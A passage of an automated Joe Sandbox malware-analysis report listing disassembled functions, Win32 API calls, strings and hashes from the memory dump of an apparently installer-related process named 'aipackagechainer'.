                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Item$Show$Text$EmptyRect
                                          • String ID: Details <<$Details >>
                                          • API String ID: 4171068809-3763984547
                                          • Opcode ID: 420a8d8c6ca50d616cef89a3a1bfa4a0739965240c03c009d59a6a5af7fd7e45
                                          • Instruction ID: d4d2a2bf8311f1ea7ae51f05631473c76fe961ae09b4fb943c4379727a3c0d13
                                          • Opcode Fuzzy Hash: 420a8d8c6ca50d616cef89a3a1bfa4a0739965240c03c009d59a6a5af7fd7e45
                                          • Instruction Fuzzy Hash: D6818C71D00609AFEB049F78CC49BBEBBB5FF08310F148229F511A7691DB35A950CBA0
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 000AFD2D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 000AFD42
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000AFD59
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          • GetWindowLongW.USER32(?,000000EC), ref: 000AFD72
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000AFD86
                                          • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 000AFD94
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000AFDA7
                                          • IsWindow.USER32(00000000), ref: 000AFDC2
                                          • DestroyWindow.USER32(00000000), ref: 000AFDDE
                                          • GetClientRect.USER32(?,?), ref: 000AFE36
                                          • IsWindow.USER32(00000000), ref: 000AFE5A
                                          • CreateWindowExW.USER32(00000000,SCROLLBAR,00000000,5402001C,?,?,?,?,?,0000E801,00000000), ref: 000AFEB2
                                          • IsWindow.USER32(00000000), ref: 000AFEBB
                                          • GetClientRect.USER32(?,?), ref: 000AFF49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$ClientMessageRectSend$AllocateCreateDestroyHeap
                                          • String ID: SCROLLBAR
                                          • API String ID: 2923869516-324577739
                                          • Opcode ID: 9ce14cb366926a4ad536612f0a80ef630e84543ab5e3d0a9fe46676160cecfb4
                                          • Instruction ID: d44d97e203b3b30ca0c3d379c21b9ffc11336d453be7db168ba5554b1bb46e97
                                          • Opcode Fuzzy Hash: 9ce14cb366926a4ad536612f0a80ef630e84543ab5e3d0a9fe46676160cecfb4
                                          • Instruction Fuzzy Hash: 3BB15770508341AFE750DFA8C848B6ABBF5FF8A710F104A2DF595972A0D771E940CB92
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 000B0485
                                          • GetWindowRect.USER32(00000000,?), ref: 000B0493
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 000B04C3
                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 000B07C1
                                          • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 000B07EA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Rect$InvalidateItemPoints
                                          • String ID:
                                          • API String ID: 2775623374-0
                                          • Opcode ID: cad168ed612379a7f04486bf297e9475a7ff46ef2fbc451b776e11ebcefa11ce
                                          • Instruction ID: db09f4ecbbdcd8a04df0bfb93037460f60aef479e72da965ed3b23c1e5858ad7
                                          • Opcode Fuzzy Hash: cad168ed612379a7f04486bf297e9475a7ff46ef2fbc451b776e11ebcefa11ce
                                          • Instruction Fuzzy Hash: 1ED114756083019FDB58CF2CC989A6BBBE5BF89300F088A5CF989DB255D734E944CB52
                                          APIs
                                          • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D11C52E5,?,?,00078C43,0000001C,0000001C,workstation,00088BC1,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?,?,0000001C,?), ref: 00079558
                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0007955E
                                          • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,0010CF70,?,D11C52E5,?,?,00078C43,0000001C,0000001C,workstation,00088BC1,000000B7,OS Version: %u.%u.%u SP%u (%s) [%s],?), ref: 00079592
                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00079598
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                          • API String ID: 2574300362-2454113998
                                          • Opcode ID: 518a8c441e5dacfa2ec2a3423a137c350b745aaea356d1b6ed80565009b990e5
                                          • Instruction ID: 767626e6ca684c9b5c16ff2c325cebbb3edbe17b7e06f1b3eae39df8b8335b9d
                                          • Opcode Fuzzy Hash: 518a8c441e5dacfa2ec2a3423a137c350b745aaea356d1b6ed80565009b990e5
                                          • Instruction Fuzzy Hash: 0FA1B170D04209EFDB18DFA8C855BEEBBF5EF48310F248219E405A7291EB749A40CB95
                                          APIs
                                          • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D11C52E5,?,?,?,?,?,?,?,?,?,?,?,?,D11C52E5), ref: 000761AA
                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 000761B0
                                          • GetErrorInfo.OLEAUT32(00000000,00000000), ref: 000761ED
                                          • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,0010C418,00000000,00000000,00000000), ref: 0007632B
                                          • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00076374
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc$ErrorInfo
                                          • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                          • API String ID: 954284200-2454113998
                                          • Opcode ID: 92ad64186b92a42cc4c58a687af1e56de018b8d57b341e5f085f8cdda594b9c3
                                          • Instruction ID: 4faa796b92473679e43ceae08ec62727f33366c6fbe5231a5e4d92fb71920739
                                          • Opcode Fuzzy Hash: 92ad64186b92a42cc4c58a687af1e56de018b8d57b341e5f085f8cdda594b9c3
                                          • Instruction Fuzzy Hash: A4A1AE70D00609EFDB14DFA8C895BEEBBF5EF44300F248129E416B7291DB799A45CB94
                                          APIs
                                            • Part of subcall function 00087860: LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
                                            • Part of subcall function 00087860: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
                                            • Part of subcall function 00087860: FreeLibrary.KERNEL32(00000000), ref: 0008793F
                                          • GetDlgItem.USER32(?,000001F4), ref: 0008EAD1
                                          • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 0008EAE2
                                          • GetDC.USER32(00000000), ref: 0008EAEA
                                          • GetDeviceCaps.GDI32(00000000), ref: 0008EAF1
                                          • MulDiv.KERNEL32(00000009,00000000), ref: 0008EAFA
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Courier New), ref: 0008EB23
                                          • GetDlgItem.USER32(?,000001F6), ref: 0008EB34
                                          • IsWindow.USER32(00000000), ref: 0008EB3D
                                          • SendMessageW.USER32(00000000,00000030,?,00000000), ref: 0008EB54
                                          • GetDlgItem.USER32(?,000001F8), ref: 0008EB5E
                                          • GetWindowRect.USER32(?,?), ref: 0008EB6F
                                          • GetWindowRect.USER32(?,?), ref: 0008EB82
                                          • GetWindowRect.USER32(00000000,?), ref: 0008EB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$ItemRect$LibraryMessageSend$AddressCapsCreateDeviceFontFreeLoadProc
                                          • String ID: Courier New
                                          • API String ID: 1731048342-2572734833
                                          • Opcode ID: 0721793f9f0549b5011435b1488a28654b6267fd026edffa31083c3b84dc0f23
                                          • Instruction ID: 0481e71649133c81a11fc8141e93d54d3d5ce5326f4995c4827457c5a5fb670a
                                          • Opcode Fuzzy Hash: 0721793f9f0549b5011435b1488a28654b6267fd026edffa31083c3b84dc0f23
                                          • Instruction Fuzzy Hash: 5841A471BC43097BFB14AF21CC46FBE7799AF48B04F010529BB497A1D2DEB4A9408B55
                                          APIs
                                          • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00082C32
                                          • GetLastError.KERNEL32 ref: 00082C60
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00082C76
                                          • FreeLibrary.KERNEL32(00000000), ref: 00082C8F
                                          • GetLastError.KERNEL32 ref: 00082C9C
                                          • GetLastError.KERNEL32 ref: 00082E8A
                                          • GetLastError.KERNEL32 ref: 00082EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                          • String ID: Advapi32.dll$ConvertStringSidToSidW
                                          • API String ID: 3460774402-1129428314
                                          • Opcode ID: c0ecafac4bd76157aa9e902fa549f8c0d4aa3a5e5fe02026f2aa7681621c3082
                                          • Instruction ID: daee22d2bf5dd54a69ef05c98502a28f6cf027a1fc933df4e84d9c60ef1cc2d8
                                          • Opcode Fuzzy Hash: c0ecafac4bd76157aa9e902fa549f8c0d4aa3a5e5fe02026f2aa7681621c3082
                                          • Instruction Fuzzy Hash: 92F1A9B1C01209EBEB10EF90D945BEEBBB4FF48314F204229E955B7281D774AA45CFA1
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5), ref: 000ABCDF
                                          • GetLastError.KERNEL32 ref: 000ABD00
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 000ABD10
                                          • GetLastError.KERNEL32 ref: 000ABD1D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000F9F75,000000FF), ref: 000ABFA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$AllocateCloseCreateHandleHeapSize
                                          • String ID: ISO-8859-1$US-ASCII$utf-16$utf-8
                                          • API String ID: 4082270022-3020978663
                                          • Opcode ID: 2690e639a64cea2cfb24219d76c7c5065d39797e196c8c85191a33e979b9f4b5
                                          • Instruction ID: 714670c1bf9cf620e7544ccde0c12153f2541eacf2c51692288c052a9375d3cb
                                          • Opcode Fuzzy Hash: 2690e639a64cea2cfb24219d76c7c5065d39797e196c8c85191a33e979b9f4b5
                                          • Instruction Fuzzy Hash: F991E571A00346EFDB10DFA4CC85BEEBBE5AF15310F144129F915AB2D2EB749944CBA1
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\JavaSoft\Java Development Kit\,00000000,?,?,D11C52E5,?,?), ref: 00086473
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?), ref: 00086609
                                          • RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?,?,?), ref: 00086665
                                          • RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?), ref: 000866B5
                                          • RegCloseKey.ADVAPI32(?), ref: 000866F5
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00086A0E
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00086A4B
                                          • RegCloseKey.ADVAPI32(?), ref: 00086AD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Close$OpenQueryValue$FindHeapProcessResource
                                          • String ID: hu$JavaHome$Software\JavaSoft\Java Development Kit\$Software\JavaSoft\Java Runtime Environment\
                                          • API String ID: 1322027183-2298091104
                                          • Opcode ID: 9a6d0e8e0258676e179c1dc7d5e771a4ad4a60815ed7f0f24bc8738bfbf1e265
                                          • Instruction ID: 404e5ef24756333f2bf7862153e2d313c3e47420eaa446dc294d642e0d5809f6
                                          • Opcode Fuzzy Hash: 9a6d0e8e0258676e179c1dc7d5e771a4ad4a60815ed7f0f24bc8738bfbf1e265
                                          • Instruction Fuzzy Hash: EE12AD709012699BDB60EB68CC89BDEB7F4FF44304F1142D8E849A7291EB75AE84CF51
                                          APIs
                                          • InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,D11C52E5), ref: 0007E2C8
                                          • GetLastError.KERNEL32 ref: 0007E2D2
                                          • EnterCriticalSection.KERNEL32(?), ref: 0007E347
                                          • LeaveCriticalSection.KERNEL32(?,7742E820,?), ref: 0007E374
                                          • GetModuleFileNameW.KERNEL32(00060000,?,00000104), ref: 0007E3C9
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0007E431
                                          • LeaveCriticalSection.KERNEL32(?,Module,?), ref: 0007E530
                                          • EnterCriticalSection.KERNEL32(?), ref: 0007E551
                                          • LeaveCriticalSection.KERNEL32(?,Module_Raw,?), ref: 0007E585
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterModule$ErrorFileHandleInitializeLastName
                                          • String ID: Module$Module_Raw$REGISTRY
                                          • API String ID: 1851870515-549000027
                                          • Opcode ID: d11de82b3c1b48cb104a9cbce232adcc5c0759df591d46c81aee7aed022da6c4
                                          • Instruction ID: 0576fb22bed1496b6198d5da9507a70e6d35a84c5f3e4bec6c152d172ab114bb
                                          • Opcode Fuzzy Hash: d11de82b3c1b48cb104a9cbce232adcc5c0759df591d46c81aee7aed022da6c4
                                          • Instruction Fuzzy Hash: 89B1BC71E01398DBDB20CB64CC44BDEB7B4AB49300F1085D9E90DA7691EB799F84CB96
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0008E17F
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0008E190
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0008E1A2
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0008E1B5
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0008E1C4
                                          • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0008E1D8
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0008E1E7
                                          • GetClientRect.USER32(?,?), ref: 0008E1FE
                                          • GetClientRect.USER32(?,?), ref: 0008E222
                                          • GetWindowRect.USER32(?,?), ref: 0008E226
                                          • GetDlgItem.USER32(?,?), ref: 0008E262
                                          • IsWindow.USER32(00000000), ref: 0008E26D
                                          • GetWindowRect.USER32(?,?), ref: 0008E288
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0008E299
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$Rect$ClientMessageSend$ItemPoints
                                          • String ID:
                                          • API String ID: 3417004906-0
                                          • Opcode ID: 54238805d9ecfbdccf1fc8efb8caa7e55ee334b9108d20ec3c5bf59649a03203
                                          • Instruction ID: 0406b61619927f681ce1c48421c4c9d7f02d86314920cdd375f08add2b6ec7fd
                                          • Opcode Fuzzy Hash: 54238805d9ecfbdccf1fc8efb8caa7e55ee334b9108d20ec3c5bf59649a03203
                                          • Instruction Fuzzy Hash: 03419D315043429FE720EF68DC48B2BB7E8BF98710F244A1DF5D5935A1DB30A984CB62
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00128FDC,00000FA0,?,?,000CC70B), ref: 000CC739
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,000CC70B), ref: 000CC744
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,000CC70B), ref: 000CC755
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000CC767
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000CC775
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000CC70B), ref: 000CC798
                                          • DeleteCriticalSection.KERNEL32(00128FDC,00000007,?,?,000CC70B), ref: 000CC7B4
                                          • CloseHandle.KERNEL32(00000000,?,?,000CC70B), ref: 000CC7C4
                                          Strings
                                          • WakeAllConditionVariable, xrefs: 000CC76D
                                          • SleepConditionVariableCS, xrefs: 000CC761
                                          • kernel32.dll, xrefs: 000CC750
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000CC73F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 2565136772-3242537097
                                          • Opcode ID: 80e2c1cb5c53ab743c7c6943b8a7539a30dd2dd3fa093a86d0f9aeb6c96fc346
                                          • Instruction ID: 240bfced5f4fcd0d5ca02e38ed2c5791c847069e87bae5ab17fcbfabb78b1105
                                          • Opcode Fuzzy Hash: 80e2c1cb5c53ab743c7c6943b8a7539a30dd2dd3fa093a86d0f9aeb6c96fc346
                                          • Instruction Fuzzy Hash: 9701B531645616ABF7201B70ED4DF3A3799EB44B117140124FE05D2AA0DFB8C880EA61
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00098977
                                          • GetParent.USER32(00000000), ref: 0009898A
                                          • GetWindow.USER32(00000000,00000004), ref: 0009899A
                                          • GetWindowRect.USER32(?,?), ref: 000989AB
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
                                          • MonitorFromWindow.USER32(?,00000002), ref: 000989D6
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 000989EC
                                          • GetWindowRect.USER32(00000000,?), ref: 00098A12
                                          • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 00098ACF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$LongMonitorRect$FromInfoParent
                                          • String ID:
                                          • API String ID: 1468510684-0
                                          • Opcode ID: dacf392461fada29dd835282839f7eaad4af1a683e4589d38b8467dba9322f9f
                                          • Instruction ID: f2052583ca63468e1a1f1bcdfca5debe88154581059dd00af34959fc9ff59459
                                          • Opcode Fuzzy Hash: dacf392461fada29dd835282839f7eaad4af1a683e4589d38b8467dba9322f9f
                                          • Instruction Fuzzy Hash: 08512E72D042199FEF20CFA8CD49AAEBBB5FB49710F254229F815E3691DB34AD00DB51
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CloseHandle$Event$ObjectSingleWait
                                          • String ID:
                                          • API String ID: 2663162059-0
                                          • Opcode ID: 58faffc8d706b2ef9f8d17762a8fb89e49c20d2f74488d80a95e0914bdd6644d
                                          • Instruction ID: 94e2eed6ac683d51649b070d144832432517f3d6e2174571afc3441ecb2eb664
                                          • Opcode Fuzzy Hash: 58faffc8d706b2ef9f8d17762a8fb89e49c20d2f74488d80a95e0914bdd6644d
                                          • Instruction Fuzzy Hash: 2F112E702047039BE7706FB6DCC8F1E76E8BF90365B140A2DE545C25A0EB74E8449F60
                                          APIs
                                          • GetLastError.KERNEL32 ref: 000AABFA
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,POST,?,?,-00000010), ref: 000AAE05
                                          • ResetEvent.KERNEL32(?), ref: 000AAE23
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AAE4B
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AAE52
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                            • Part of subcall function 000ABCA0: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5), ref: 000ABCDF
                                            • Part of subcall function 000ABCA0: GetLastError.KERNEL32 ref: 000ABD00
                                            • Part of subcall function 000ABCA0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,000F9F75,000000FF), ref: 000ABFA6
                                          Strings
                                          Memory Dump Source
